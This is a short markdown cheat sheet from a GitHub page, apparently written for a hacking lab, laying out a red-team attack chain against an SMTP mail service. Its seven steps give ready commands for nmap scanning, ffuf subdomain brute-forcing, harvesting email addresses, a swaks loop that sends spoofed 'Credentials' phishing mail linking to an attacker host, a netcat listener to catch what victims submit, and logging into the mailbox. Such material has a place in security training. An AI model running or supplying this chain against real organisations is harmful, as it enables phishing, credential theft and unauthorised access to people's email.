Skip to content

Latest commit

 

History

History
122 lines (30 loc) · 1.28 KB

Red Team - SMTP.md

File metadata and controls

122 lines (30 loc) · 1.28 KB
Raw

Red Team - Attack on SMTP

  1. Information Gathering | Techniques: Nmap Scanning
nmap -sV -sC -v -p- --min-rate=10000 <Target IP>
  1. Subdomain Enumeration | Techniques: Using ffuf for subdomain Brute-Forcing
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://TargetDomain.com -H "Host: FUZZ.TargetDomain.com"
  1. Email Collection | Techniques: Extracting Email from Web Page
#Manually visit Target Domain / SubDomain and extract emails to mails.txt
  1. Email Engagement | Techniques: Sending Emails with swaks
while read mail; do swaks --to $mail --from support@TargetDomain.com --header "Subject: Credentials" --body "goto http://10.10.14.4" --server 10.10.10.197; done < mails.txt
  1. Credential Harvesting | Techniques: Netcat Listener
nc -lvp 80 # to listen for incoming connections
  1. Accessing SMTP | Techniques: Using evolution to Access SMTP
apt install evolution
#and with Configure SMTP server 10.10.10.197 and email user@TargetDomain.com
  1. Exploring Sent Items | Techniques: Checking Sent Emails
#Check sent items for any useful information afther accessing the SMTP server